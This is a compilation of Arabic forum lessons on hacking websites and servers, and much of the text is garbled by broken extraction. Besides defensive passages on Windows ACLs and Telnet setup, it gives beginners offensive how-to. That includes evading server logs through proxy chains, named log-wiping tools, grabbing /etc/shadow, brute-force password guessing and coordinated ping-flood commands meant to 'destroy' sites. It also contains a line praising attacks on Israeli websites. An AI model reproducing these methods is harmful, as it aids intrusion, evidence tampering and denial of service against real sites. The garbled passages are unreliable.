ينتهي. ) والذي الملف هذا على الهاكر حصول فحين الهاكرزوذلك ( PWLباالمتداد له ملك هي بجهازك الخاصة السر كلمة فإن

الملف هذا تشفير بفك تقوم التي البرامج من العديد لوجود . ويندوز نظام فإن بالطبع السر كلمة على على 98والحصول يحتوي

ويندوز نظام في موجودا كان الذي من أقوى ولكنها 95تشفير ، هذا بكسر يقوم برنامج بإيجاد الهاكرز يقوم حتى وقت مسألة

التشفير.

اإلنترنت- 5 وتطبيقات برامجهناك ! إن بل فحسب متصفحات مجرد ليست اإلنترنت تطبيقات إنفي استخدامها يتم التي األخرى والبرامج التطبيقات من العديد

الثغرات. من العديد على تحتوي قد البرامج هذه ولكن اإلنترنتفي للدخول الهاكر يستخدمه الذي المشرع الباب تكون التي األمنية

برنامج ! البرامج هذه ومن إيذائك و الذي ICQجهازك الشهير . من يعتبر وهو اإلنترنت في المستخدمين من الماليين يستخدمهمن يقدمه لما نظرا اإلنترنت مستخدمي بين شعبية البرامج أكثر

. أكثر من أيضا ولكنه المستخدمين بين التواصل تسهل خدماتللتخريب إمكانيات من يقدمه لما نظرا للهاكرز شعبية البرامج

. البرامج من العديد اإلنترنت في فيوجد ضحاياهم بأجهزة والعبثهذه تأثير ويختلف البرنامج، لهذا المستخدمين بمهاجمة تقوم التي

رقم على الحصول من القيام IPالبرامج إلى بالمستخدم الخاصعن الجهاز يتوقف حتى لديه البيانات من هائلة كمية بإرسال

! للتشغيل إعادة بعملية للقيام يضطره مما للمستخدم االستجابة

6 -6: المشبوهة- المواقعفي األمنية الثغرات من الكثير اكتشاف يتم ألخرى فترة منأصحاب قبل من كبير بشكل الثغرات هذه استغالل ويتم المتصفحات

. على الحصول من المخترق تمكن قد الثغرات هذه الهاكرز مواقع . عليك يجب لذا جهازك من الشخصية والمعلومات الملفات بعضمن أصحابها كون في يشتبه التي المواقع زيارة عند الحذر

في بريمجات وضع على المواقع أصحاب لقدرة نظرا المخترقينإلى والدخول متصفحك في األمنية الثغرات الستغالل مواقعهم

من. المخربون بعض به يقوم ما ذلك على األمثلة وأبسط جهازكبريمج ) وفتح( scriptوضع المتصفح برنامج تشغيل بتكرار يقوم

للمستخدم يستجيب ال ويصبح النظام موارد تنتهي حتى جديدة نوافذتم ! الثغرة هذه فإن بالطبع الجهاز تشغيل إلعادة يضطره مما

اكسبلورر إنترنت متصفح في مثاال 4تالفيها تعطي ولكنها فوق وما. المخترقون به يقوم أن ممكن الذي للتخريب  بسيطا

7: اإلضافية- الخدماتال قد التي اإلضافية الخدمات بعض على التشغيل نظام يشتمل

بعض فمثال جهازك، إلى المدخل تكون قد والتي المستخدم يحتاجهاوخادم ويب خادم على تحتوي ويندوز نظام من FTPاإلصدارات

إلكتروني ) بريد غالب( SMTPوخادم قبل من تستخدم ال وهيأمنية ثغرات على األحيان أغلب في تحتوي ولكنها المستخدمين

. لهذه تعديالت إصدار دائما ويتم بجهازك العبث من المخترقين تمكن . لذا بتركيبها يقومون ال المستخدمين أغلب ولكن األمنية المشاكل

المستخدم يقوم أن التشغيل نظام تركيب أثناء المستحسن فمنكان حالة وفي لها محتاجا يكون ال عندما الخدمات هذه تركيب بإلغاء

اتصاله عن تشغيلها إيقاف المستحسن فمن لها، محتاجا المستخدممفتوحا البرامج هذه عليه تعمل الذي المنفذ يكون ال حتى باإلنترنتهذه استغالل يريدون الذي المخترقين على الطريق يسد مما

. جهازك في للدخول الخدمات

التي الطرق جميع يشمل ال المقال هذا في ذكرناه ما فإن بالطبعورفع الطرق هذه عن فكرة كافإلعطاء ولكنه ، الهاكرز يستخدمها

يسهم مما باإلنترنت، اتصالهم عن المستخدمين لدى الحذر درجة. لإلختراق تعرضهم احتمالية من التقليل  في

والبرامج الطرق عن بالتحدث سنقوم الله بإذن القادم العدد فيو الهاكرز التقاء استخدامها المستخدم على يجب التي الدفاعية

شرورهم.3." اإلنترنت" عبر األمن

اختراق .4 تعلم في تفكروا ان قبل تعرفوه ان يجب الذي الكثير هناكالسيرفرات و المواقع

 here we G0حسناا .. ال بيفتحوا يعرفوا ما غير من هاكينج الناسيعملوا من dosالكثير

. shell accountاو بووم. و اوامر شويه مش . it rebootsيكتبوا ديه!!! اختراقك!. تم لقد ثغره

: مثل بسيط امر تستخدم لما الدوس  /FTP ftp://hostnameحتى فيانتر تدوس و عندك

عندك سكان GFI LANguard network security scannerاو عملت وبورت منهم و مفتوح بورت كذا لقيت و سايت بتدوسعليه.. 21على

.. .. تم انه يعني هذا التلنت طريق عن نفسالشيئ و بالموقع تتصل واختراقك!!

بتعمل لما عشان : ftpباوامر log inده زي و... cd lcd dir lsبسيطهتانيه حاجه اي

ماتعمل مجرد اسمها log inالن حاجه LOGS...)LOG.FILES( 1فيال بقى ده؟؟‍‍ LOGايه

)log filesال بالجهاز اتصل شخص كل عن شئ كل بتسجل logedديهin: مثل( معلومات على يحصلوا و

بالضبط الهاكينج عملت متى يروناتيت موقع اي من

ايه اد onlineفضلتبتاعك >>>>>>>IP Addressال(host nameال الجهاز ) اسم

القارهالدولهالمدينهالمتصفح

التشغيل نظامscreen resolutionال

الشاشه الوان( الخاصبك الخدمه (>>>>ISPمزود

:log filesانواع 3هناك مهمه WTMP \ \ باالضافه - الخروج الدخول ميعاد مع خروج، دخول كل يسجل

ال  ttyو hostالىUTMP - منOnlne اللحظه هذه في

LASLOG\ خروج - الدخول جاء اي من

( !! عليهم نظره يلقي ان اراد االدمن لو لذا الكثير الكثير (log.filesو( بك يوقع ( ...track you downسوف

! : حلجه بسادي بروكسي هاستخدم انا مفيشمشكله تقول ربماالبروكسيهات عن تعرفها الزم

-- >-- الموقع--< البروكسي خادم !FTPجهازك اخر-- شئ اي او تلنت . شويه معاه لو مين انت يعرف عاوز االدمن و موقع اخترقت لو

.. ! نفس هيجيبك و سيرفر البروكسي يخترق حتي او فلوسهيعرفبروكسي من اكثر بتستخدم لو الكالم

-- >-- الثاني--< البروكسي خادم االول البروكسي خادم جهازك-- --...so onالثالث<

!! النهايه في لكن اكثر وقت و فلوسكثير بسهيحتاج يجيبك يقدريقدر..

.. اسمه شيئ تستخدم ايضا تقدر :-WingateلكنWingate او واحد انترنت كونكشن بمشاركه يسمح بروكسي هو

ال.. فائده ال Wingateاكثر سيخفي الذي IPانه الكمبيوتر عن!! به ستتصل

.. عنه اعرفه ما كل هذا لالسف بعضاالشخاصاالذكياء 1لكن نحتاج! نجده؟ اين و نستخدمه كيف ليعلمونا

.... اممممممــم ايضاا ماذا ..!! كيفتظل تعرف ان يجب شئ كل قبل تذكرت anonymousاه

ال !!...... webعلى ال.. مثل جهازك؟ تؤمن كيف استخدم. spywareوfirewall ال ) zone alarmمثل و . كالكوكيز الهيستوري ملفات امسح

.. الشخصيه الملفات و المؤقته االنترنت ملفات و هيستوري االنترنت !! ) لدي عالنت ادخل ان قبل يوم كل االشياء هذه افعل انا اللوق و

اسمه رائع ., windows washerبرنامج لقد عندك يكون ان يجب. .. هاهاها سرقته المدرسه من عليه خصلت

. اكتب و لجوجل اذهب الكثير how to Stay anonymous on the webوhow to secure to secure my computerاو

ستجد .. انك متأكد انا و كهذا شئ ابحثعن و جيد امني موقع زور اوالكثير ..

ال تنسى ال ان .. Preety Good Privacy )PGP(dو يجب مجاني انه! فيه ايميلك تترك و موقع اختراق تريد كنت لو عندك يكون

: من عليه تحصل ان /http://www.pgpi.org تستطيعok ان يجب لكن الكثير هناك لكن كتابته يمكنني ما كل هذا ان اظن

! عنه تبحث

اخواني يا الدرسشيئا هذا يعلمك ان ارجوا

هذه .. .. االجابه يحتاج الذي الوحيد لست و االن سؤال لدي لكنالهاكينج يتعلم ان قبل الجميع يعرفها ان يجب االجابه

ال- 1 تستخدم نجده؟ wingateكيف اين و ؟ما على شئ كل ان نتأكد كيف و نجدهم؟ كيف و اللوقز؟ نمسح كيف

اثار! اي نترك لم اننا نتأكد كيف و خلفنا؟ tracksيرام؟ : اسمه و اعرفه برنامج هو log modifierها

ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c

wtmped.c zap.c ==================================================

========================================== . اكثر او سؤالين سألت و اسبوعين اخر في عرفته ما كل اخي يا هذا

البقاء كيفيه و anonymousعن البروكسيز استخدام عن و عالنت.. . سألت سؤال كم ليسالمهم بالنهايه لكن الناسجاوبوني بعض

!!!. في تبحث ان اخي يا ارجو لذا المهم هو هذا االجابه تجد ان يجب. االختراق تتعلم بعدها ثم اوال المجال هذا

انتهى،،،

" الشبكات" أمن> إعصار> منتدى من منقول

> : الجوكر> الكاتبكتاب . عن نقال الحماية بعضطرق سأتناول الموضووع هذا فى

هذه . مثل لمواضيع القسم هذا إلفتقار وهذاضميركم . وزاع سماع أرجو لذلك

--------------------------------------------------------كيفية- 1 و الشبكة لها تتعرض قد التي األمنية المخاطر لبعض عرض

. منها  الوقاية2. بأمنها- الشبكة الى الولوج لعالقة  وصف

3. الوصول- تراخيص بواسطة الموارد حماية  كيفيةلمكونات- 4  .ACLشرح

5. التراخيص- تفحص لعملية  شرح

: يلي مما المرخصألي غير للوصول عرضة تكون قد شبكة  أي

1.  المعدات-

3.  البيانات-

3. الشبكة-  عمليات

4.  الموارد-

عبر المتداولة البيانات حساسية مدى على الشبكة أمن درجة تعتمد الشبكة.

كل للند الند شبكات ففي ، الشبكة لنوع وفقا األمن تنظيم يتم وشبكات أمن في المزود يتحكم بينما ، الخاص أمنه في يتحكم جهاز

. المزود  الزبون

أمن على المحافظة في تساعد التي بعضاإلجراءات هناك و الشبكة:

1. األمن- إجراءات مع التعامل على للمستخدمين المتقن  التدريب

غير- 2 قبل من اليها الوصول صعوبة و المعدات أمن من التأكد المخولين.

تكون- 3 قد ألنها األعين عن إخفاءها و النحاسية األسالك حماية. للتجسس  عرضة

وكالة- 4 فتضعها مقاييسالتشفير أما الحاجة عند البيانات تشفيراألمريكية الوطني  .)National Security Agency )NSAاألمن

أقراصمرنة- 5 محركات على تحتوي ال بأجهزة المستخدمين تزويدبالمزودات األجهزة هذه تتصل و ، أقراصصلبة حتى أو مضغوطة أو

إقالع رقاقة األجهزة ROM Boot Chipباستخدام هذه تشغيل عند وذاكرة في اإلقالع برنامج بتحميل المزود ليبدأ RAMيقوم للجهاز

 بالعمل.

على- 6 إجراؤها يتم التي العمليات جميع لتسجيل برامج استخدام. الضرورة عند لمراجعتها  الشبكة

تصاريح- 7 و Permissionsإعطاء للبيانات للوصول للمستخدمينمشاركة يجب الحالة هذه في و عمله طبيعة حسب كل المعدات

. باستخدامها لآلخرين للسماح المعدات و  البيانات

بحقوق- 8 المستخدمين العمليات Rightsتزويد و األنشطة تحدد. النظام على إجراءها لهم  المسموح

الحقوق : و التصاريح إلعطاء أساسيان نظامان  هناك

1. مرور- بكلمة المحمية  المشاركة

2. الوصول-  تصاريح

المطلوب الموارد من لكل سر كلمة تعيين يتم األول النظام فيكلمة لديه من قبل من فقط الموارد لهذه الوصول يتم و مشاركتها

 السر.

وصول أم فقط للقراءة هي هل الوصول درجة تحديد تستطيع كما. السر لكلمة وفقا أم كامل

لكل التصاريح إعطاء و الحقوق تعيين يتم الثاني النظام فيكلمة المستخدم يدخل أن يكفي و ، مستخدمين مجموعة أو مستخدم

حقوق على النظام ليتعرف التشغيل نظام الى الدخول عند المرور

أمنا أكثر النظام هذا يعتبر و له، المتوفرة التصاريح و المستخدم هذا. مستخدم بكل أكبر تحكما الشبكة مدير يعطي و السابق النظام  من

مدير الى المعلومات هذه تمرير يتم المرور كلمة و اإلسم إدخال عندالحسابات الولوج )Security Accounts Manager )SAMأمن كان فإذا

جهاز قاعدة Workstationالى مع مقارنتها يتم المعلومات فإنالى الولوج كان إذا أما الجهاز، في المحلية األمن حسابات بيانات

مزود Domainنطاق الى إرسالها يتم المعلومات الذي SAMفإنالمستخدم اسم كان فإذا النطاق، حسابات بيانات قاعدة مع يقارنها

الى الدخول من يمنع المستخدم فإن صالحين غير المرور كلمة أوبإصدار يقوم الفرعي األمن نظام فإن صحيحين كانا إذا أما النظام،

ولوج و Access Tokenبطاقة ولوجه فترة بالمستخدم النظام تعرف: التالية المعلومات على البطاقة هذه  تحتوي

األمني- 1 خاص )Security Identifier )SIDالمعرف فريد رقم هو و. حساب  بكل

المجموعة- 2 التي Group SIDsمعرفات المجموعة تحدد التي هي و. المستخدم لها  ينتمي

.Privilegesاإلمتيازات- 3 لحسابك الممنوحة الحقوق تمثل هي  و

إصدار يتم أنه جهازك Access Tokenكما من اإلتصال محاولتك عندبعد عن الولوج اإلجراء هذا على يطلق و شبكتك على آخر بجهاز

Remote Logon. 

هو الشبكة أمن عن الحديث عند مراعاتها يجب التي األمور مناألقراصو محركات و الطابعات مثل الموارد أمن على المحافظة

هذه إلستخدام تصاريح بتعيين الشبكة مدير يقوم التي و الملفات الموارد.

: يلي ما الملفات الى للوصول تعطى قد التي التصاريح من  و

1. الملفات- نسخ بعرضو لك يسمح و قراءة  تصريح

2. للتطبيقات- تنفيذ  تصريح

3. الملفات- محتوى في بالتعديل يسمح و كتابة  تصريح

اإلستخدام- 4  .No Accessممنوع

و المستخدمين من مجموعة أو لمستخدم منحها ممكن التصاريح و. أ�سهل  هذا

بالوصول تحكم قائمة الموارد من مورد كل Access ControlيمتلكList )ACL( في إدخالها يتم معلومة كل عليها ACLو Accessيطلق

Control Entry )ACE(. 

إنشاء على ACEيتم تحتوي و المورد إلستخدام التصريح منح عندSID نوع الى باإلضافة التصريح الممنوحة مجموعته أو للمستخدم

و قراءة تصريح منح قد ما مجموعة مدير أن افترضنا فلو التصريح،فإن ما لملف كتابة الى ACEتصريح إضافته ثم إنشاؤه يتم جديد

ACL سيحتوي و بالملف المجموعة SIDعلى ACEالخاص لمدير. كتابة تصريح و قراءة تصريح الى  باإلضافة

ل نوعان   :ACEهناك

مسموح- 1  .AccessAllowedالوصول

ممنوع- 2 تصريح AccessDeniedالوصول كان إذا إنشاؤها يتم وهو  .No Accessالوصول

مقارنة يتم ما مورد الى الوصول ما مستخدم يحاول عندما هكذا وSID مع به كل SIDsالخاص .ACLمن ACEفي  للمورد

ويندوز ويندوز NTفي ترتيب 2000و تكون ACEيتم بحيثAccessDenied ACEs قبلAccessAllowed ACEs وجد فإذا ،SID

من أي في الى AccessDenied ACEsخاصتك الوصول من فستمنعفسيبحثفي إال و الحقوق AccessAllowed ACEsالمورد من للتأكد

على يعثر لم فإن لك فستعرض SIDالممنوحة لخاصتك مطابق. للمورد الوصول من تمنعك تحذير  رسالة

: الدرس  ملخص

الشبكة أمن على للمحافظة اتخاذها يجب التي بعضاإلجراءات هناك: منها  و

استخدام ، البيانات تشفير ، المعدات حماية ، المستخدمين تدريب. الشبكة على تجرى التي العمليات مراقبة ، األقراص عديمة  أجهزة

الحقوق : و التصاريح إلعطاء أساسيان نظامان  هناك

1. مرور- بكلمة المحمية  المشاركة

2. الوصول- تصاريح

5. " المواقع اختراق في للمبتدئين مهمة "مصطلحات>منقول<

>BeReal:الكاتب<

عليكم  السالماختراق طرق تعلم في المبتدئين الملفالخواني هذا اعددت لقد

فقد ،  المواقعال قد التي و عليهم غريبة تكون قد التي الكلمات بعض تواجههم

 ، يفهمونهاالتعلم . و الفهم مواصلة في العواقب بعض لهم تشكل بالتالي و

الموفق .فالله==================================================

===================يعمل . -:)Telnet( تلنت هو و الويندوز في موجود صغير برنامج هو و

 ككالينتالبرنامج . هذا باستطاعة أن أي كزبون دائما تكون وضعيته أو

بالسيرفر  اإلتصالحالتها . و مستواها حسب كل العمليات بعض اجراء و أوالخادم

الهاكرز  يستخدمهلإلتصال و ، له التابع السيرفر و الموقع تشغيل نظام لمعرفة غالبا

 بالسيرفربي ) تي اإلف بورت خصوصا و معين بورت الى( 21عبر للدخول

خفية بطريقة  الموقعAnonymous Mode او الباسورد ملف سحب و الموقع لعرضملفات

البيانات من .غيرهالى اذهب ، البرنامج ستظهر Start ==< Run ==< telnet الستخدام و

التلنت .شاشة------------------------------------------------------------------------

أو السكان على -:Scanner برامج للمسح موجودة برامج هي وكشف و  المواقع

واسعة بيانات قاعدة تملك أنها كما سريعة، فهي ، وجدت ثغراتهاإنكبيرة  و

االكسبلويت أو الثغرات على تطبيقها )Exploits( تحتوي يتم التيالموقع على

و . ال أم الثغرات هذه احدى من يعاني السيرفر كان اذا فيما لرؤيةأمثلة  من

برنامج البرامج، Omran و Stealth و Shadow Security Scanner هذهFast 

Scanner ، . الخعلى سكان بعمل تقوم التي منها ، مختلفة أنواع البرامج لهذه و

سيرفر أو نظامالـ سيرفرات على بالسكان المختصة البرامج مثل منها IIS معين و

المسح  برامجفقط اي جي السي ثغرات ذلك CGI على الى ما . و

-----------------------------------------------------------------------

المتصفح . -:)Exploits( اكسبلويت خالل من تنفذ تنفيذية برامج هيعنوان لها و

URL ، بعضها تقوم و الموقع بعرضملفات اإلكسبلويتات هذه تقومالى  بالدخول

هجوم بشن تقوم اكسبلويتات توجد كما ، فيه التجول و السيرفرمعين بورت  على

بـ يسمى ما هذا و ، كراشله لعمل السيرفر Buffer Over Flow في

Exploits .ال فمنها ، اإلكسبلويت من أنواع ال CGI Exploits هناك CGI أو

Bugs منها وال Unicodes Exploits ال منها ، و Buffer Over Flow Exploits ، و

منها، PHP Exploits ال ال منها حجب DOS Exploitsو بعملية تقوم التي و

 الخدمةيكن لم ان و الهجوم لهذا المطلوبة الثغرة فيها وجد إن للسيرفر

السيرفر  علىفايروول بلغة . Fire Wall أي المكتوبة بعضاإلكسبلويتات هناك و

يكون و السي. )c.( امتدادها

و لترجمتها برنامجا او كومبايلر الى تحتاج بالذات اإلكسبلويتات هذهتحويها

خالل من يستخدم عادي تنفيذي اكسبلويت الى االكسبلويت أيلتحويل و ، المتصفح

إما نحتاج ، تنفيذيا برنامجا الى هذه السي بلغة المكتبو اإلكسبلويت الى

ضمن يعمل كومبايلر اي الى او ، يونكس لينوكساو التشغيل نظامالتشغيل نظام

برنامج . ) ( المحوالت أو المترجمات الكومبايلرات هذه أشهر ويندوز اسمه

Borland C++ Compiler كما ويندوز التشغيل نظام تحت تعمل هي وسابقا .ذكرنا

----------------------------------------------------------------------

الناري لحمايتها -:FireWall الجدار السيرفرات تستعملها برامج هيالولوج  من

الحماية . تمثل هي المتطفلين قبل من ملفاتها لنظام شرعي الغيرطبعا  ، للسيرفر

السيرفرات لحماية المستخدمة الفايرووالت بأن أنوه لكني وتختلف) ( المواقع  

األجهزة لحماية تستخدم التي تلك  . عن----------------------------------------------------------------------

Token:- المظلل الباسورد ملف الذي )Shadowed Passwd( هو والباسورد فيه  يكون

أو * شكل ، . Shadowed أي x على مظلال الباسورد ملف وجدت إنحينها عليك  فيجب

يسمى الذي و المظلل الغير الباسورد ملف عن . Shadow file البحثفي تجده

/etc/shadow .----------------------------------------------------------------------

Anonymouse:- فيها تدخل التي المجهولة و الخفية الوضعية هيالمراد الموقع  الى

.، بنفساإلسم بي تي االف برامج في خاصية هناك اختراقهتستعملها ان  تستطيع

منه الملفات سحب و السيرفر الى المجهول الدخول . في----------------------------------------------------------------------

Valnerableties:- أو محصنة الغير الضعف مواضع أو الثغرات أيللعطب القابلة

مما عليه أمنيا خطرا تشكل قد التي و السيرفر منها يعاني التي والى  يؤدي

أو اختراقه و السيرفر مهاجمة في الهاكرز قبل من استغاللها. تدميره

؟ مفردها هي  ما   ، Valnerable و الضعف موضع باألصح أو ثغرة أي المكان

البريدية . القوائم في الكلمة هذه تكثر و سليم بشكل مؤمن الغيرالمهتمة للمواقع

الموجودة البريدية كالقائمة غيرها و الشبكات أمن و بالسيكيوريتيموقع  في

Security Focus غيرها او تراك بوق . أو----------------------------------------------------------------------

passwd file : و الروت باسورد على يحتوي الذي الملف هواألشخاص باسوردات

في . موجود الموقع باسورد السيرفر الى بالدخول لهم المصرح.نفسالملفطبعا

----------------------------------------------------------------------الـ أو له : root الجذر ، للنظام الرئيسي و الجذري المستخدم هو و

الصالحيات كلأو اضافة أو إزالة من السيرفر و الموقع ملفات مع التعامل في

للملفات .تعديلالمواقع في نفسه الموقع باسورد هو الروت باسورد يكون ما غالبا

ضمن تعمل  التيو اسدي بي فري و سوالري يونكسو لينوكساو التشغيل نظام

. غيرها----------------------------------------------------------------------

ملفات :Server السيرفر كل أن اذ ، للموقع المستضيف الجهاز هوفيه توضع  الموقع

عالية امكانيات ذو لكنه األجهزة من كغيره عاد كمبيوتر جهاز فهوالقرص حجم ككبر

باإلنترنت متصل هو و ، الهائلة سرعته و هو 24الصلب هذا و ، ساعة كون  سبب

شغالة اإلنترنت 24المواقع السيرفر.   على يستضيف و يملك قد موقع من  أكثر

. ضربة ألخرى شركة من و آلخر سيرفر من يعتمد هذا و واحد،اختراق هي طبعا  الهاكرز

اختراق حينها فيسهل ، المواقع من الكثير يملك الذي السيرفرالتي المواقع  جميع

أو ملفاتها في العبث أو تدميرها الى إما يؤدي مما تحته تندرجأو واجهتها  تشويه

يحدث ما هذا و ، تماما النت من مسحها أو تدميرها و بياناتها سرقة للمواقع

المجاهدون . - أيها خيرا الله جزاكم الحمد لله و بكثرة و - اإلسرائيلية.

-----------------------------------------------------------------------فلو أوفر أنواع : ) Buffer over Flow ( بوفر من نوع هي و

التي  االكسبلويتاتمثل السيرفر من معينة نقطة على الطفح هجوم لشن تستعمل

بي تي اإلف بورت على الهجومبهذا بهذا اتصاله فصل و السيرفر اتصال اضعاف ألجل غيره أو

الرقعة اللغاء و البورتطبعا - - الكراشلها عمل بعد مجددا استغاللها يتم كي بها الموجودة

استغاللها  يتمو حواجز او رقع أي وجود دون و بسهولة و لها اإلتصال معاودة في

منها البيانات . سحبالخدمة حجب بعملية ما نوعا شبيهة هي تقوم - DOS - و أنها اذ

على لود اوفر  بعمليةالسيرفر من مركز . جزء،،،

6. " للمبتدئين المواقع "اختراقللمبتدئين :::اإلختراق

اختراق في المستخدمة الطرق بشرح أقوم سوف القسم هذا فيتعتمد الطرق وهذه للمبتدئين بالنسبة  المواقع

. قائمة على تحتوي البرامج وهذه التخمين برامج على كليا اعتمادايقوم كلماتسر على تحتوي  كبيرة

السر كلمة إلى يصل أن الى الهدف الموقع على بتجربها البرنامجوبعد الهدف بالموقع الخاصة الصحيحة

. أنها الطريقة هذه يعيب لكن الموقع على المخترق يسيطر ذلكوباأليام بالساعات طويلة أوقات إلى تستمر

باألنترنت الوقت طوال متصال سيبقى الجهاز ألن ماديا مكلفة وهيالسرالصحيحة كلمة اكتشاف يتم .حتى

،،،انتهى

برامج " بدون المواقع " تدمير> ماكسهاك: > الكاتب

برامج بدون المواقع لتدمير طرق عدة بشرح الدرسسأقوم هذا فينفسه الموقع على كبير عدد يجتمع أن لتدميرها شرط هناك ولكن

نفسالوقت بعضفي معا الطريقة بتطيق ...ويقوموااألولى ::الطريقة

: ==>=== " ـ " التالي األمر اكتب الدوس إلى بالتوجه قمPing www.xx.com

الموقع اسم Xxx: يعنيالموقع بي أي رقم لك سيخرج ذلك .بعد

األمر بكتابة :قم) الموقع ( )اسم الضربه ping -n )عددالضربات( I- )قوة

ذلك :مثالping -n 1000 -l 400 www.xxx.com

الثانية ::الطريقةاألعلى في الي بالطريقة المراد الموقع تبع بي األي استخراج ...بعد

األمر بكتابة :قمping -t ip

الموراد ip حيث الموقع بي أي .يعني،،،انتهى

" التلنيت "> نورة موقع من >منقول

على قادر ستكون الموضوع هذا قراءة بعدالتلنت خدمة معنى  فهم

بها والتحكم الخدمة تشغيل مكان معرفةالتلنت وإستخدام التثبيت تمرين

ويندوز في التلنت التلنت 2000خدمة عميل لمستخدمين تسمح األوامر سطر وإستعمال التلنت خدمة يشغل بكمبيوتر باإلتصالالتلنت خدمة تكون أن ويمكن ، يجلسأمامه كان لو كما ويصبح

البعض بعضهم مع المستخدمين إلتصال  عبارةإلى يدعم أن يمكن التلنت خدمة يشغل كمبيوتر تلنت 63وأي عميل

وقت أي فيTelnet Authentication

You can use your local Windows 2000 user name and password or domain account information to access the Telnet server. The security scheme is integrated into Windows 2000 security. If you

do not use the NT LAN Manager )NTLM( authentication option, the user name and password are sent to the Telnet server as plain

text.s 2000 security context for authentication and the user is not prompted for a user 

If you are using NTLM authentication, the client uses the Windowname and password. The user name and password are

encrypted. اجل من بك الخاصه المرور وكلمة اسمك استعمال يمكنمن التحقق خيار تستخدم كنت إذا ، التلنت ملقم إلى الوصول

تكن NTLM الصحة لم وإذا مشفرة المرور كلمة و االسم سيرسلكنصعادي سترسل مستخدمة

مالحظةIf the User Must Change Password At Next Logon option is set for

a user, the user cannot log on to the Telnet service when NTLM authentication is used. The user must log on to the server directly

and change the password, and then log on through the Telnet client. ألحد المرور خصائصكلمة في منشط الخيار هذا كان إذا

إستخدام عند التلنت ملقم على الدخول من يتمكن لن المستخدمينNTLM خدمة على التسجيل ثم المرور كلمة تغير ثم الدخول يجب

 التلنت

التلنت ملقم إيقاف و تشغيلIn a Windows 2000 Server default installation, the Telnet service is

set to manual startup. You can use the Services snap-in or the Computer Management snap-in to start, stop, or configure the

Telnet service for automatic startup. االفتراضي التثبيت فيالوضع 2000لويندوز على وتكون منشطة غير التلنت خدمة تكون

األداة إستخدام ويمكن ، خدمة Services اليدوي إيقاف أو لتشغيلالتلنت

التلنت  مكانIn the Computer Management snap-in, Telnet is a service located under the Services and Applications node. Select Services from

the console tree, and then select Telnet from the list of services in the details pane.

االوامر سطر من إيقافة و التلنت تشغيلYou can also start or stop the Telnet service from a command

prompt. To start Telnet Server, type net start tlntsvr or net start telnet at the command prompt, and then press Enter. To stop

Telnet Server, type net stop tlntsvr or net stop telnet at the command prompt, and then press Enter.

 Telnet Server Admin األداةYou can use the Telnet Server Admin utility to start, stop, or get

information about Telnet Server. You can also use it to get a list of current users, terminate a user's session, or change Telnet Server

registry settings. األداة إستخدام Telnet Server Admin يمكنويمكن الملقم عن معلومات على الحصول أو إيقاف أو لتشغيل

الحالية الجلسة في التحكم و المستخدمين عدد على الحصول كذلكاالعدادات تغير و اإلتصال إنهاء من

األداة على , Telnet Server Admin لفتح Telnet أضغطAdministration Tool في اضغط Administrative Tools الموجودة أوStart, ثم Run, اكتب tlntadmn, ثم OK. األداة فتح تستطيع ال كنت إذا

Telnet Server Admin , اإلدارة أدوات تثبيت إلى تحتاج)Adminpak.msi(.

7. التلنت عميلYou can use Microsoft Telnet Client to connect to a remote computer running the Telnet service or other Telnet server

software. Once you have made this connection, you can communicate with the Telnet server. The type of session you conduct depends on how the Telnet software is configured.

Communication, games, system administration, and local logon simulations are some typical uses of Telnet.

The Telnet client uses the Telnet protocol, part of the TCP/IP suite of protocols, to connect to a remote computer over a network. The

Telnet client software allows a computer to connect to a remote server. You can use the Telnet client provided with Windows 2000 to connect to a remote computer, log on to the remote computer,

and interact with it as if you were sitting in front of it.Users of previous versions of Microsoft's Telnet client may notice

a few changes in the version included with Windows 2000. The most obvious change is that Microsoft Telnet Client is now a

command-line application rather than a Windows application. As a command-line application, Microsoft Telnet Client will seem very

familiar to users of UNIX-based Telnet clients.An important new feature found in Microsoft Telnet Client is NTLM

authentication support. Using this feature, a computer using Microsoft Telnet Client can log on to a Windows 2000 computer

running the Telnet service by using NTLM authentication.

التلنت إستعمالاكتب ,Run ثم ,Start انقر ,Telnet لتشغيل كتابة .telnet ثم وتستطيعtelnet . يكون أن يجب التلنت أستخدام من لتتمكن األوامر موجه فيلديك TCP/IP البروتوكول ويكون تكوينه ومضبوط جهازك على مثبت

به ستتصل الذي الجهاز على مسجل حسابTo display help for Telnet, type help at the Microsoft Telnet

command prompt. To connect to a site, type open >computer_name< where >computer_name< is the IP address or

host name of the computer running the Telnet service.التلنت بخدمة وإتصال ضبط تمرين

جهازين األقل على شبكة لديك يكون أن يجب التمرين هذا فيالبعض بعضهم مع متصلين

اسمه االول الجهاز أن الثاني Hishem1 ولنفترض Hishem2 وعلى مثبته التلنت خدمة سنقوم Hishem2 وسنفترضأن ثم

من Hishem2 إلى Hishem1 باإلتصالجهاز على الخدمة بتثبيت اآلن Hishem1 سنقومإلى الدخول  Administrator ك Hishem1 سجل

 .Services اضغط Administrative Tools ثم ,Programs ثم , Start مناألداة  Services تظهر

على مزدوج ضغط ثم اسفل ألى مرر النافذه  .Telnet منحوار مربع  )The Telnet Properties )Local Computerيظهر.Automatic إلى Manual من Startup Type غير

القسم . Start اضغط,Service status فيالحوار OK اضغط مربع Local Computer( Telnet properties( إلغلق

التحكم وحدة  . Services أغلق

من  Hishem2 إلى Hishem1 سنتصل

.Run ثم , Start من .OK ثم telnet اكتب

تلنت مايكروسوفت أوامر موجه تظهرالمتاحه ? help اكتب األوامر لمشاهدة  أو

التلنت خدمة في المدعومة األوامر جميع تظهر open Hishem2 اكتب

الترحيب شاشة ستشاهد

مالحظةحرف إستخدام open بدل o يمكن

في األوامر سطر من تشغيلها يمكنك اوامر  Hishem2 أيجهاز إلى اآلن سننتقل توقفه ال نشط اإلتصال هذا Hishem2 اترك

التلنت جلسة لمشاهدة

جهاز اإلتصال Hishme2 من ونقطع نوقف ثم التلنت خدمة سنراقبالعميل  Hishem1 من

.Run ثم , Start من .OK ثم tlntadmn اكتب

األداة اوامر إطار Telnet Server Admin يظهرقد 1اكتب نشاهد المثال في كما الحالية اإلتصاالت جميع لمشاهدة

الدومين اسم و المستخدم االتصال IP ورقم NOR عرضاسم ونوعالدخول  ووقت

مستخدم 2اكتب جلسة إلنهاء  فصله تريد الذي المستخدم هوية تحديد منك تطلب رسالة تظهر

المثال 1اكتب في معنا يوجد وال القائمة في المستخدم رقم هذا تكتب لذالك احد و 1غير  

المتاحة باالوامر الئحة تظهر

جهاز إلى المثال Hishem1 إرجع مثل إنفصل قد االتصال أن  ستراللمتابعة مفتاح أي اضغط

